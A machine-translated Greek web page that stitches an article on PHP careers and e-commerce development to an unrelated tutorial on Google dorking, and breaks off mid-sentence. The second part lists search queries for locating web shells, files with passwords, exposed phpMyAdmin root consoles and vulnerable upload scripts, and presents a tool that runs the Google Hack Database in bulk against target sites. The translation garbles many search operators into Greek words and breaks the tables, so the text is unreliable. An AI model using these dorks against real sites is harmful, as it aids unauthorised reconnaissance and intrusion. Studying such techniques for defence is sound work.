Επιπλέον, ένα ηλεκτρονικό κατάστημα απαιτεί προγραμματισμό ενός συστήματος ανάλυσης - έτσι ώστε να μπορείτε να δείτε στον πίνακα διαχείρισης πόσες παραγγελίες έγιναν και πληρώθηκαν, για ποιο ποσό και ποια προϊόντα πληρώθηκαν από ποιες κατηγορίες κ.λπ. Επιπλέον, θα πρέπει να είναι δυνατή η εμφάνιση τέτοιων αναφορών για διάφορες περιόδους. Κατά τον προγραμματισμό ενός ηλεκτρονικού καταστήματος, συχνά εφαρμόζεται και η αναφορά πωλήσεων για λογιστικούς και φορολογικούς σκοπούς.

Γι' αυτό το στάδιο στο οποίο χρησιμοποιείται η γλώσσα προγραμματισμού PHP είναι το πιο σημαντικό, το μεγαλύτερο από άποψη χρόνου και το πιο ακριβό και ακριβοπληρωμένο στην ανάπτυξη ιστοσελίδων. Και μόλις καταλάβετε πώς να προγραμματίσετε ένα ηλεκτρονικό κατάστημα, θα μπορείτε να δημιουργήσετε σενάρια για έναν ιστότοπο σχεδόν κάθε πολυπλοκότητας.

Δημοτικότητα της PHP

Η δημοτικότητα της PHP αποδεικνύεται από το γεγονός ότι χρησιμοποιείται από το 83,1% όλων των τοποθεσιών όπου ήταν δυνατός ο εντοπισμός μιας γλώσσας προγραμματισμού από την πλευρά του διακομιστή.

Όλα τα πιο δημοφιλή CMS που καταλαμβάνουν τις πρώτες θέσεις στις αξιολογήσεις δημοτικότητας (τόσο επί πληρωμή όσο και δωρεάν: WordPress, Joomla, Drupal, Modx, Bitrix. Magento κ.λπ.) είναι γραμμένα στη γλώσσα προγραμματισμού PHP.

Επίσης, η δημοτικότητα της γλώσσας προγραμματισμού PHP αποδεικνύεται από τα πολλά δημιουργημένα πλαίσια PHP, όπως τα Laravel, Yii, CakePHP, Slim, Zend Framework 2, PHPixie, CodeIgniter, Symfony 2 και άλλα. Υπάρχει ένας τεράστιος αριθμός φόρουμ και μεγάλων κοινοτήτων - για την PHP γενικά, για κάθε πλαίσιο και για κάθε CMS ξεχωριστά.
Θα προσθέσω επίσης ότι οι μεγαλύτεροι ιστότοποι του κόσμου, για παράδειγμα, Facebook, Wikipedia, είναι επίσης γραμμένοι σε PHP.

Πώς μπορείτε να κερδίσετε χρήματα με γνώση της PHP;

Δεδομένης της δημοτικότητας της PHP, υπάρχει σταθερή υψηλή ζήτηση για προγραμματιστές PHP. Η γνώση της PHP και η δυνατότητα προγραμματισμού σε αυτή τη γλώσσα θα ανοίξει νέες ευκαιρίες για να κερδίσετε χρήματα. Ας δούμε τα κύρια με τα οποία μπορείτε πραγματικά να κερδίσετε χρήματα σήμερα:

Κερδίστε χρήματα με την ανάπτυξη σεναρίων. Όλοι οι ιστότοποι εξελίσσονται συνεχώς και απαιτούν περιοδικά τη σύνταξη νέων σεναρίων ή την ανάπτυξη πρόσθετων λειτουργιών, λειτουργικών μονάδων κ.λπ. Για τέτοιες εξελίξεις, οι ιδιοκτήτες ιστότοπων απευθύνονται σε προγραμματιστές PHP. Επιπλέον, σε αυτή την περίπτωση μπορείτε να κερδίσετε χρήματα με δύο τρόπους:

παρακολουθείτε παραγγελίες για να βρείτε έναν ανεξάρτητο προγραμματιστή.

δημιουργούν ιδέες για μαζικά σενάρια. Έχοντας μια ιδέα για ένα σενάριο που θα είναι σίγουρα σε ζήτηση μεταξύ, για παράδειγμα, των ιδιοκτητών ηλεκτρονικών καταστημάτων, μπορείτε να αναπτύξετε ανεξάρτητα ένα τέτοιο σενάριο και να το πουλήσετε σε ιδιοκτήτες ηλεκτρονικών καταστημάτων.

Οριστικοποίηση έτοιμων σεναρίων «κατόπιν παραγγελίας». Όλα είναι απλά εδώ - αναλαμβάνετε την τροποποίηση ή τη διόρθωση ενός σεναρίου. Αλλά σε αυτή την περίπτωση, υπάρχει μια απόχρωση - αρχικά το σενάριο μπορεί να μην είναι πολύ καλά φτιαγμένο και η τελειοποίησή του μπορεί να πάρει περισσότερο χρόνο από το να γράψετε ένα σενάριο από την αρχή. Επομένως, εάν χρησιμοποιείτε αυτήν τη μέθοδο για να κερδίσετε χρήματα, κοιτάξτε αρχικά πολύ προσεκτικά τι θα τροποποιήσετε και θα ολοκληρώσετε.

Ανάπτυξη πρόσθετων για CMS. Σε αυτή τη μέθοδο, όλα είναι ίδια όπως όταν βγάζετε χρήματα από σενάρια. Συχνά, οι ιστότοποι που δημιουργούνται σε έτοιμο CMS απαιτούν τη σύνταξη κάποιου είδους πρόσθετου, πρόσθετου ή επέκτασης. Και μπορείτε να κερδίσετε χρήματα εδώ με δύο τρόπους:

παρακολούθηση παραγγελιών για την ανάπτυξη προσθηκών, πρόσθετων και επεκτάσεων σε ανεξάρτητη βάση.

αναπτύξτε και πουλήστε ένα μαζικό πρόσθετο που θα είναι σίγουρα σε ζήτηση στους περισσότερους ιστότοπους.

Δικά και κοινά έργα. Εάν έχετε μια ιδέα για ένα έργο στο Διαδίκτυο (startup), για παράδειγμα, μια ιδέα για μια χρήσιμη υπηρεσία ή εφαρμογή που θα έλυνε ένα συγκεκριμένο πρόβλημα, τότε μπορείτε να ξεκινήσετε την εφαρμογή της. Στο αρχικό στάδιο, μπορεί να είναι και μόνο ως χόμπι, εκτός από την κύρια δουλειά σας. Στη συνέχεια, όταν είναι σαφές ότι το χόμπι εξελίσσεται σε ένα μεγάλο έργο, θα είναι δυνατό να αφιερώσετε περισσότερο χρόνο σε αυτό.

Δημιουργία δυναμικών ιστοσελίδων και μηχανών για αυτούς. Μπορείτε επίσης να κερδίσετε καλά χρήματα αναπτύσσοντας προσαρμοσμένους ιστότοπους, δουλεύοντας ως ελεύθερος επαγγελματίας ή σε ένα στούντιο ιστού.

Δημιουργία ιστοσελίδων για τον εαυτό σας. Μπορείτε να δημιουργήσετε έναν ιστότοπο για τον εαυτό σας, να τον γεμίσετε με χρήσιμο περιεχόμενο - και όταν ο ιστότοπος έχει επαρκή αριθμό επισκεπτών, αρχίστε να κερδίζετε χρήματα τοποθετώντας διαφημίσεις επί πληρωμή σε αυτόν ή προωθώντας τα προϊόντα κάποιου μέσω προγραμμάτων συνεργατών.

Νομίζω ότι πολλοί από εσάς έχετε σκεφτεί ότι όλες οι παραπάνω μέθοδοι για να κερδίσετε χρήματα μπορούν να συνδυαστούν. Και είναι σωστό! Μπορείτε να δημιουργήσετε έναν ιστότοπο για τον εαυτό σας και να κερδίσετε χρήματα παθητικά πουλώντας διαφημίσεις από αυτόν, καθώς και να δημιουργήσετε ένα σενάριο ή μια προσθήκη και να το πουλήσετε σε εξειδικευμένους ιστότοπους, κερδίζοντας χρήματα σε αυτόματο πιλότο από κάθε πώληση και ταυτόχρονα μπορείτε να εργάζεστε ακόμα σε έναν ιστό Στούντιο. Γιατί όχι? Φυσικά μπορείτε να!

Πόσα μπορεί να κερδίσει ένας προγραμματιστής PHP;

Με τα κέρδη των προγραμματιστών PHP, όλα είναι ατομικά. Πολλά εδώ εξαρτώνται από τον τόπο εργασίας, τον τρόπο εργασίας, το επίπεδο γνώσεων, την εμπειρία, τα προσόντα, τις σχετικές πρόσθετες γνώσεις που έχει ο προγραμματιστής και ούτω καθεξής. Επομένως, κατ' αρχήν, δεν μπορεί να υπάρξει ακριβής αριθμός εδώ. Μπορούμε όμως να δούμε ποιοι μισθοί προσφέρονται κατά την αναζήτηση προγραμματιστών PHP σε ένα web studio και πόσα είναι διατεθειμένοι να πληρώσουν για ένα έργο σε ανταλλαγές ανεξάρτητων επαγγελματιών.

Η παρακάτω εικόνα δείχνει τον προτεινόμενο μισθό για προγραμματιστές PHP σε ένα web studio. Επιπλέον, αυτός είναι ο μισθός για προγραμματιστές PHP χωρίς εργασιακή εμπειρία:

Εάν έχετε εργασιακή εμπειρία, μπορείτε να κερδίσετε πολύ περισσότερα. Παρακάτω είναι οι μισθοί που προσφέρονται σε έμπειρους προγραμματιστές PHP.

Και σήμερα μπορείτε επίσης να κερδίσετε αξιοπρεπή χρήματα από ελεύθερους επαγγελματίες:

συμπέρασμα

Η PHP είναι η πιο δημοφιλής γλώσσα προγραμματισμού μεταξύ των προγραμματιστών ιστού. Η συντριπτική πλειοψηφία όλων των ιστοσελίδων στο Διαδίκτυο είναι γραμμένες σε PHP. Έχοντας τη γνώση και την ικανότητα ανάπτυξης σε αυτήν τη γλώσσα προγραμματισμού, μπορείτε να κερδίσετε καλά χρήματα και υπάρχουν πολλές επιλογές για να κερδίσετε χρήματα - από την εργασία σε ένα web studio έως την ανάπτυξη του δικού σας έργου ή startup.

Οποιαδήποτε αναζήτηση για τρωτά σημεία σε πόρους Ιστού ξεκινά με αναγνώριση και συλλογή πληροφοριών.
Η νοημοσύνη μπορεί να είναι είτε ενεργή - ωμή δύναμη αρχείων και καταλόγων του ιστότοπου, εκτέλεση σαρωτών ευπάθειας, μη αυτόματη περιήγηση στον ιστότοπο ή παθητική - αναζήτηση πληροφοριών σε διαφορετικές μηχανές αναζήτησης. Μερικές φορές συμβαίνει ότι μια ευπάθεια γίνεται γνωστή ακόμη και πριν ανοίξει η πρώτη σελίδα του ιστότοπου.

Πώς είναι αυτό δυνατόν?
Τα ρομπότ αναζήτησης, που περιφέρονται συνεχώς στο Διαδίκτυο, εκτός από πληροφορίες χρήσιμες για τον μέσο χρήστη, συχνά καταγράφουν πράγματα που μπορούν να χρησιμοποιηθούν από εισβολείς για να επιτεθούν σε έναν πόρο Ιστού. Για παράδειγμα, σφάλματα δέσμης ενεργειών και αρχεία με ευαίσθητες πληροφορίες (από αρχεία διαμόρφωσης και αρχεία καταγραφής έως αρχεία με δεδομένα ελέγχου ταυτότητας και αντίγραφα ασφαλείας βάσης δεδομένων).
Από τη σκοπιά ενός ρομπότ αναζήτησης, ένα μήνυμα σφάλματος σχετικά με την εκτέλεση ενός ερωτήματος sql είναι απλό κείμενο, αδιαχώριστο, για παράδειγμα, από την περιγραφή των προϊόντων στη σελίδα. Εάν ξαφνικά ένα ρομπότ αναζήτησης συναντήσει ένα αρχείο με την επέκταση .sql, το οποίο για κάποιο λόγο κατέληξε στον φάκελο εργασίας του ιστότοπου, τότε θα γίνει αντιληπτό ως μέρος του περιεχομένου του ιστότοπου και θα ευρετηριαστεί επίσης (συμπεριλαμβανομένων, ενδεχομένως, των κωδικών πρόσβασης που καθορίζεται σε αυτό).

Τέτοιες πληροφορίες μπορούν να βρεθούν γνωρίζοντας ισχυρές, συχνά μοναδικές, λέξεις-κλειδιά που βοηθούν στο διαχωρισμό των «ευάλωτων σελίδων» από τις σελίδες που δεν περιέχουν τρωτά σημεία.
Μια τεράστια βάση δεδομένων ειδικών ερωτημάτων που χρησιμοποιούν λέξεις-κλειδιά (τα λεγόμενα dorks) υπάρχει στο exploit-db.com και είναι γνωστή ως Google Hack Database.

Γιατί google;
Τα Dorks στοχεύουν κυρίως στην Google για δύο λόγους:
− την πιο ευέλικτη σύνταξη λέξεων-κλειδιών (εμφανίζεται στον Πίνακα 1) και ειδικών χαρακτήρων (εμφανίζεται στον Πίνακα 2).
− το ευρετήριο Google εξακολουθεί να είναι πιο πλήρες από αυτό των άλλων μηχανών αναζήτησης.

Πίνακας 1 - Κύριες λέξεις-κλειδιά Google

Λέξη-κλειδί
Εννοια
Παράδειγμα
ιστοσελίδα
Αναζήτηση μόνο στον καθορισμένο ιστότοπο. Λαμβάνει υπόψη μόνο το url
site:somesite.ru - θα βρει όλες τις σελίδες σε έναν δεδομένο τομέα και υποτομείς
inurl
Αναζήτηση με λέξεις που υπάρχουν στο uri. Σε αντίθεση με το cl. λέξεις "site", αναζητά αντιστοιχίες μετά το όνομα της τοποθεσίας
inurl:news - βρίσκει όλες τις σελίδες όπου η δεδομένη λέξη εμφανίζεται στο uri
κείμενο
Αναζήτηση στο σώμα της σελίδας
intext:"μποτιλιαρίσματα" - εντελώς παρόμοια με το συνηθισμένο αίτημα για "μποτιλιαρίσματα"
τίτλος
Αναζήτηση στον τίτλο της σελίδας. Κείμενο μεταξύ ετικετών <br></td> <td width="214">intitle:”index of” - θα βρείτε όλες τις σελίδες με λίστες καταλόγου <br></td> </tr><tr><td width="214">εσωτ <br></td> <td width="214">Αναζήτηση σελίδων με καθορισμένη επέκταση <br></td> <td width="214">ext:pdf - βρίσκει όλα τα αρχεία pdf <br></td> </tr><tr><td width="214">Τύπος αρχείου <br></td> <td width="214">Επί του παρόντος, εντελώς παρόμοια με την τάξη. η λέξη "ext" <br></td> <td width="214">τύπος αρχείου:pdf - παρόμοιο <br></td> </tr><tr><td width="214">σχετίζεται με <br></td> <td width="214">Αναζητήστε ιστότοπους με παρόμοια θέματα <br></td> <td width="214">related:google.ru - θα δείξει τα ανάλογα του <br></td> </tr><tr><td width="214">Σύνδεσμος <br></td> <td width="214">Αναζητήστε ιστότοπους που συνδέονται με αυτό <br></td> <td width="214">link:somesite.ru - θα βρείτε όλους τους ιστότοπους που έχουν σύνδεσμο προς αυτό <br></td> </tr><tr><td width="214">καθορίζω <br></td> <td width="214">Εμφάνιση ορισμού λέξης <br></td> <td width="214">define:0day - ορισμός του όρου <br></td> </tr><tr><td width="214">κρύπτη <br></td> <td width="214">Εμφάνιση περιεχομένων της σελίδας στην προσωρινή μνήμη (εάν υπάρχει) <br></td> <td width="214">cache:google.com - θα ανοίξει μια προσωρινά αποθηκευμένη σελίδα <br></td> </tr></tbody></table><p>Πίνακας 2 - Ειδικοί χαρακτήρες για ερωτήματα Google <br></p><table><tbody><tr><td width="214"><b>Σύμβολο</b><br></td> <td width="214"><b>Εννοια</b><br></td> <td width="214"><b>Παράδειγμα</b><br></td> </tr><tr><td width="214">“<br></td> <td width="214">Ακριβής φράση <br></td> <td width="214">intitle:"Σελίδα διαμόρφωσης δρομολογητή RouterOS" - αναζήτηση για δρομολογητές <br></td> </tr><tr><td width="214">*<br></td> <td width="214">Οποιοδήποτε κείμενο <br></td> <td width="214">inurl: "bitrix*mcart" - αναζήτηση τοποθεσιών στο bitrix με μια ευάλωτη μονάδα mcart <br></td> </tr><tr><td width="214">.<br></td> <td width="214">Οποιοσδήποτε χαρακτήρας <br></td> <td width="214">Index.of - παρόμοιο με το ευρετήριο αιτήματος <br></td> </tr><tr><td width="214">-<br></td> <td width="214">Διαγράψτε μια λέξη <br></td> <td width="214">error -warning - εμφάνιση όλων των σελίδων που έχουν σφάλμα αλλά όχι προειδοποίηση <br></td> </tr><tr><td width="214">..<br></td> <td width="214">Εύρος <br></td> <td width="214">cve 2006..2016 - εμφάνιση τρωτών σημείων ανά έτος από το 2006 <br></td> </tr><tr><td width="214">|<br></td> <td width="214">Λογικό "ή" <br></td> <td width="214">linux | παράθυρα - εμφάνιση σελίδων όπου εμφανίζεται είτε η πρώτη είτε η δεύτερη λέξη <br></td> </tr></tbody></table><br>Αξίζει να γίνει κατανοητό ότι οποιοδήποτε αίτημα σε μια μηχανή αναζήτησης είναι αναζήτηση μόνο με λέξεις. <br>Είναι άχρηστο να ψάχνουμε για μεταχαρακτήρες στη σελίδα (εισαγωγικά, παρενθέσεις, σημεία στίξης κ.λπ.). Ακόμη και η αναζήτηση για την ακριβή φράση που καθορίζεται σε εισαγωγικά είναι μια αναζήτηση λέξεων, ακολουθούμενη από μια αναζήτηση για μια ακριβή αντιστοίχιση στα αποτελέσματα. <p>Όλα τα dorks της βάσης δεδομένων Google Hack χωρίζονται λογικά σε 14 κατηγορίες και παρουσιάζονται στον Πίνακα 3. <br>Πίνακας 3 – Κατηγορίες βάσεων δεδομένων Google Hack <br></p><table><tbody><tr><td width="168"><b>Κατηγορία</b><br></td> <td width="190"><b>Τι σας επιτρέπει να βρείτε</b><br></td> <td width="284"><b>Παράδειγμα</b><br></td> </tr><tr><td width="168">Πατώματα <br></td> <td width="190">Web shells, δημόσιοι διαχειριστές αρχείων <br></td> <td width="284">Βρείτε όλους τους παραβιασμένους ιστότοπους όπου ανεβαίνουν τα αναφερόμενα κελύφη ιστού: <br>(intitle:"phpshell" OR intitle:"c99shell" OR intitle:"r57shell" OR intitle:"PHP Shell" OR intitle:"phpRemoteView") `rwx` "uname" <br></td> </tr><tr><td width="168">Αρχεία που περιέχουν ονόματα χρήστη <br></td> <td width="190">Αρχεία μητρώου, αρχεία διαμόρφωσης, αρχεία καταγραφής, αρχεία που περιέχουν το ιστορικό των εντολών που έχουν εισαχθεί <br></td> <td width="284">Βρείτε όλα τα αρχεία μητρώου που περιέχουν πληροφορίες λογαριασμού: <br><i>filetype:reg reg +intext:"διαχειριστής λογαριασμού στο διαδίκτυο"</i><br></td> </tr><tr><td width="168">Ευαίσθητοι κατάλογοι <br></td> <td width="190">Κατάλογοι με διάφορες πληροφορίες (προσωπικά έγγραφα, διαμορφώσεις vpn, κρυφά αποθετήρια κ.λπ.) <br></td> <td width="284">Βρείτε όλες τις λίστες καταλόγων που περιέχουν αρχεία που σχετίζονται με το VPN: <br><i>"Config" τίτλος:"Ευρετήριο" intext:vpn</i><br>Ιστότοποι που περιέχουν αποθετήρια git: <br><i>(intext:"ευρετήριο του /.git") ("γονικός κατάλογος")</i><br></td> </tr><tr><td width="168">Ανίχνευση διακομιστή Ιστού <br></td> <td width="190">Έκδοση και άλλες πληροφορίες σχετικά με τον διακομιστή ιστού <br></td> <td width="284">Βρείτε τις κονσόλες διαχείρισης διακομιστή JBoss: <br><i>inurl:"/web-console/" intitle:"Κονσόλα διαχείρισης"</i><br></td> </tr><tr><td width="168">Ευάλωτα Αρχεία <br></td> <td width="190">Σενάρια που περιέχουν γνωστά τρωτά σημεία <br></td> <td width="284">Βρείτε ιστότοπους που χρησιμοποιούν ένα σενάριο που σας επιτρέπει να ανεβάσετε ένα αυθαίρετο αρχείο από τον διακομιστή: <br><i>allinurl:forcedownload.php?file=</i><br></td> </tr><tr><td width="168">Ευάλωτοι Διακομιστές <br></td> <td width="190">Σενάρια εγκατάστασης, κελύφη ιστού, ανοιχτές κονσόλες διαχείρισης κ.λπ. <br></td> <td width="284">Βρείτε ανοιχτές κονσόλες PHPMyAdmin που εκτελούνται ως root: <br><i>intitle:phpMyAdmin "Καλώς ορίσατε στο phpMyAdmin ***" "εκτελείται στο * ως root@*"</i><br></td> </tr><tr><td width="168">Μηνύματα Σφάλματος <br></td> <td width="190">Διάφορα σφάλματα και προειδοποιήσεις συχνά αποκαλύπτουν σημαντικές πληροφορίες - από την έκδοση CMS έως τους κωδικούς πρόσβασης <br></td> <td width="284">Τοποθεσίες που παρουσιάζουν σφάλματα κατά την εκτέλεση ερωτημάτων SQL στη βάση δεδομένων: <br><i>"Προειδοποίηση: mysql_query()" "μη έγκυρο ερώτημα"</i><br></td> </tr><tr><td width="168">Αρχεία που περιέχουν ζουμερές πληροφορίες <br></td> <td width="190">Πιστοποιητικά, αντίγραφα ασφαλείας, email, αρχεία καταγραφής, δέσμες ενεργειών SQL κ.λπ. <br></td> <td width="284">Βρείτε σενάρια προετοιμασίας sql: <br><i>τύπος αρχείου:sql και "insert into" -site:github.com</i><br></td> </tr><tr><td width="168">Αρχεία που περιέχουν κωδικούς πρόσβασης <br></td> <td width="190">Οτιδήποτε μπορεί να περιέχει κωδικούς πρόσβασης - αρχεία καταγραφής, σενάρια sql κ.λπ. <br></td> <td width="284">Μητρώα που αναφέρουν κωδικούς πρόσβασης: <br><i>Τύπος αρχείου:</i><i>κούτσουρο</i><i>κείμενο:</i><i>κωδικός πρόσβασης |</i><i>περάστε |</i><i>pw</i><br>Σενάρια sql που περιέχουν κωδικούς πρόσβασης: <br><i>ext:</i><i>sql</i><i>κείμενο:</i><i>όνομα χρήστη</i><i>κείμενο:</i><i>Κωδικός πρόσβασης</i><br></td> </tr><tr><td width="168">Ευαίσθητες πληροφορίες ηλεκτρονικών αγορών <br></td> <td width="190">Πληροφορίες σχετικά με ηλεκτρονικές αγορές <br></td> <td width="284">Βρείτε κωδικούς PIN: <br><i>dcid=</i><i>bn=</i><i>καρφίτσα</i><i>κωδικός=</i><br></td> </tr><tr><td width="168">Δεδομένα δικτύου ή ευπάθειας <br></td> <td width="190">Πληροφορίες που δεν σχετίζονται άμεσα με τον πόρο Ιστού, αλλά επηρεάζουν το δίκτυο ή άλλες υπηρεσίες εκτός Ιστού <br></td> <td width="284">Βρείτε σενάρια αυτόματης διαμόρφωσης διακομιστή μεσολάβησης που περιέχουν πληροφορίες σχετικά με το εσωτερικό δίκτυο: <br><i>inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl</i><br></td> </tr><tr><td width="168">Σελίδες που περιέχουν πύλες σύνδεσης <br></td> <td width="190">Σελίδες που περιέχουν φόρμες σύνδεσης <br></td> <td width="284">ιστοσελίδες saplogon: <br><i>intext:"2016 SAP AG. Ολα τα δικαιώματα διατηρούνται." τίτλος: "Σύνδεση"</i><br></td> </tr><tr><td width="168">Διάφορες ηλεκτρονικές συσκευές <br></td> <td width="190">Εκτυπωτές, δρομολογητές, συστήματα παρακολούθησης κ.λπ. <br></td> <td width="284">Βρείτε τον πίνακα διαμόρφωσης του εκτυπωτή: <br><i>τίτλος:"</i><i>ιπποδύναμη</i><i>λέιζερτζετ"</i><i>inurl:</i><i>SSI/</i><i>Auth/</i><i>σειρά_</i><i>config_</i><i>πληροφορίες συσκευής.</i><i>htm</i><br></td> </tr><tr><td width="168">Συμβουλές και τρωτά σημεία <br></td> <td width="190">Ιστότοποι σε ευάλωτες εκδόσεις CMS <br></td> <td width="284">Βρείτε ευάλωτες προσθήκες μέσω των οποίων μπορείτε να ανεβάσετε ένα αυθαίρετο αρχείο στον διακομιστή: <br><i>inurl:fckeditor -intext:"ConfigIsEnabled = False" intext:ConfigIsEnabled</i><br></td> </tr></tbody></table><br>Οι Dorks επικεντρώνονται συχνότερα στην αναζήτηση σε όλους τους ιστότοπους του Διαδικτύου. Ωστόσο, τίποτα δεν σας εμποδίζει να περιορίσετε το εύρος αναζήτησης σε οποιονδήποτε ιστότοπο ή ιστότοπο. <br>Κάθε ερώτημα της Google μπορεί να εστιαστεί σε έναν συγκεκριμένο ιστότοπο προσθέτοντας τη λέξη-κλειδί "site:somesite.com" στο ερώτημα. Αυτή η λέξη-κλειδί μπορεί να προστεθεί σε οποιοδήποτε λάκκο. <p><b>Αυτοματοποίηση της αναζήτησης τρωτών σημείων</b><br>Έτσι γεννήθηκε η ιδέα να γραφτεί ένα απλό βοηθητικό πρόγραμμα που αυτοματοποιεί την αναζήτηση για τρωτά σημεία χρησιμοποιώντας μια μηχανή αναζήτησης (google) και βασίζεται στη βάση δεδομένων Google Hack.</p><p>Το βοηθητικό πρόγραμμα είναι ένα σενάριο γραμμένο σε nodejs χρησιμοποιώντας phantomjs. Για την ακρίβεια, το σενάριο ερμηνεύεται από το ίδιο το phantomjs. <br>Το Phantomjs είναι ένα πλήρες πρόγραμμα περιήγησης ιστού χωρίς GUI, ελεγχόμενο από κώδικα js και με ένα βολικό API. <br>Το βοηθητικό πρόγραμμα έλαβε ένα αρκετά κατανοητό όνομα - dorks. Εκτελώντας το στη γραμμή εντολών (χωρίς επιλογές), λαμβάνουμε σύντομη βοήθεια με πολλά παραδείγματα χρήσης: <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/edd/6fb/ccc/edd6fbccc5ec340abe750f3073c1b427.jpg' width="100%" loading=lazy loading=lazy><br>Εικόνα 1 - Λίστα βασικών επιλογών dorks</p><p>Η γενική σύνταξη του βοηθητικού προγράμματος είναι: dork "command" "option list". <br>Μια λεπτομερής περιγραφή όλων των επιλογών παρουσιάζεται στον Πίνακα 4.</p><p>Πίνακας 4 - Σύνταξη Dorks <br></p><table border="1"><tbody><tr><td width="214"><b>Ομάδα</b><br></td> <td width="214"><b>Επιλογή</b><br></td> <td width="214"><b>Περιγραφή</b><br></td> </tr><tr><td rowspan="4" width="214">ghdb <br></td> <td width="214">-μεγάλο <br></td> <td width="214">Εκτυπώστε μια αριθμημένη λίστα με κατηγορίες κουκλών Βάση δεδομένων Google Hack <br></td> </tr><tr><td width="214">-γ "αριθμός ή όνομα κατηγορίας" <br></td> <td width="214">Φορτώστε τις πόρτες της καθορισμένης κατηγορίας με αριθμό ή όνομα <br></td> </tr><tr><td width="214">-q "φράση" <br></td> <td width="214">Λήψη dorks που βρέθηκαν κατόπιν αιτήματος <br></td> </tr><tr><td width="214">-o "αρχείο" <br></td> <td width="214">Αποθηκεύστε το αποτέλεσμα σε ένα αρχείο (μόνο με επιλογές -c|-q) <br></td> </tr><tr><td rowspan="8" width="214">google <br></td> <td width="214">-d "dork" <br></td> <td width="214">Ορίστε ένα αυθαίρετο dork (η επιλογή μπορεί να χρησιμοποιηθεί πολλές φορές, ο συνδυασμός με την επιλογή -D επιτρέπεται) <br></td> </tr><tr><td width="214">-Δ "αρχείο" <br></td> <td width="214">Χρησιμοποιήστε dorks από αρχείο <br></td> </tr><tr><td width="214">-s "site" <br></td> <td width="214">Ορισμός τοποθεσίας (η επιλογή μπορεί να χρησιμοποιηθεί πολλές φορές, ο συνδυασμός με την επιλογή -S επιτρέπεται) <br></td> </tr><tr><td width="214">-S "αρχείο" <br></td> <td width="214">Χρήση ιστότοπων από ένα αρχείο (τα dorks θα αναζητηθούν για κάθε ιστότοπο ανεξάρτητα) <br></td> </tr><tr><td width="214">-f "φίλτρο" <br></td> <td width="214">Ορισμός πρόσθετων λέξεων-κλειδιών (θα προστεθούν σε κάθε κουτάκι) <br></td> </tr><tr><td width="214">-t "αριθμός ms" <br></td> <td width="214">Μεσοδιάστημα μεταξύ αιτημάτων στο google <br></td> </tr><tr><td width="214">-T "αριθμός ms" <br></td> <td width="214">Λήξη χρονικού ορίου εάν παρουσιαστεί captcha <br></td> </tr><tr><td width="214">-o "αρχείο" <br></td> <td width="214">Αποθηκεύστε το αποτέλεσμα σε ένα αρχείο (μόνο εκείνα τα κομμάτια για τα οποία βρέθηκε κάτι θα αποθηκευτούν) <br></td> </tr></tbody></table><br>Χρησιμοποιώντας την εντολή ghdb, μπορείτε να λάβετε όλα τα dorks από το exploit-db με αυθαίρετο αίτημα ή να καθορίσετε ολόκληρη την κατηγορία. Εάν καθορίσετε την κατηγορία 0, ολόκληρη η βάση δεδομένων θα εκφορτωθεί (περίπου 4,5 χιλιάδες dorks). <p>Η λίστα των διαθέσιμων κατηγοριών παρουσιάζεται στο Σχήμα 2. <br><br><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/b8f/b11/ffe/b8fb11ffeaced5066fd2fd9e43be67fb.jpg' width="100%" loading=lazy loading=lazy></p><p>Σχήμα 2 - Λίστα διαθέσιμων κατηγοριών dork GHDB</p><p>Η ομάδα της Google θα αντικαταστήσει κάθε dork στη μηχανή αναζήτησης google και θα αναλύσει το αποτέλεσμα για αγώνες. Οι διαδρομές όπου βρέθηκε κάτι θα αποθηκευτούν σε ένα αρχείο. <br>Το βοηθητικό πρόγραμμα υποστηρίζει διαφορετικές λειτουργίες αναζήτησης: <br>1 σκάφος και 1 τοποθεσία. <br>1 dork και πολλές τοποθεσίες? <br>1 τοποθεσία και πολλά dorks? <br>πολλές τοποθεσίες και πολλά dorks? <br>Η λίστα των dorks και των τοποθεσιών μπορεί να καθοριστεί είτε μέσω ενός επιχειρήματος είτε μέσω ενός αρχείου.</p><p><b>Επίδειξη εργασίας</b><br>Ας προσπαθήσουμε να αναζητήσουμε τυχόν τρωτά σημεία χρησιμοποιώντας το παράδειγμα αναζήτησης μηνυμάτων σφάλματος. Με την εντολή: dorks ghdb –c 7 –o errors.dorks όλα τα γνωστά dorks της κατηγορίας «Μηνύματα σφαλμάτων» θα φορτωθούν όπως φαίνεται στην Εικόνα 3. <br><br><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/28c/386/641/28c386641d1528652f7f8e8b8089097a.jpg' width="100%" loading=lazy loading=lazy><br>Εικόνα 3 – Φόρτωση όλων των γνωστών dorks της κατηγορίας "Μηνύματα σφάλματος".</p><p>Τα Dorks κατεβαίνουν και αποθηκεύονται σε ένα αρχείο. Τώρα το μόνο που μένει είναι να τα «ρυθμίσετε» σε κάποια τοποθεσία (βλ. Εικόνα 4). <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/8e0/a8a/3af/8e0a8a3af4f26544da1faa584813dbff.jpg' width="100%" loading=lazy loading=lazy><br>Εικόνα 4 – Αναζήτηση για τρωτά σημεία του ιστότοπου που σας ενδιαφέρει στην κρυφή μνήμη Google</p><p>Μετά από κάποιο χρονικό διάστημα, πολλές σελίδες που περιέχουν σφάλματα ανακαλύπτονται στον υπό μελέτη ιστότοπο (βλ. Εικόνα 5).</p><p><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/10b/e83/ba3/10be83ba38f172213ba06b3f9ad05a58.jpg' width="100%" loading=lazy loading=lazy><br>Εικόνα 5 – Βρέθηκαν μηνύματα σφάλματος</p><p>Ως αποτέλεσμα, στο αρχείο result.txt λαμβάνουμε μια πλήρη λίστα των dorks που οδηγούν στο σφάλμα. <br>Το Σχήμα 6 δείχνει το αποτέλεσμα της αναζήτησης σφαλμάτων τοποθεσίας. <br><br>Εικόνα 6 – Αποτέλεσμα αναζήτησης σφάλματος</p><p>Στην κρυφή μνήμη για αυτό το dork, εμφανίζεται ένα πλήρες backtrace, αποκαλύπτοντας τις απόλυτες διαδρομές των σεναρίων, το σύστημα διαχείρισης περιεχομένου τοποθεσίας και τον τύπο της βάσης δεδομένων (βλ. Εικόνα 7). <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/0a9/455/588/0a9455588496d6609f5e13d598cb5a48.jpg' width="100%" loading=lazy loading=lazy><br>Σχήμα 7 – αποκάλυψη πληροφοριών σχετικά με το σχεδιασμό του ιστότοπου</p><p>Ωστόσο, αξίζει να ληφθεί υπόψη ότι δεν δίνουν αληθινά αποτελέσματα όλα τα dorks από το GHDB. Επίσης, η 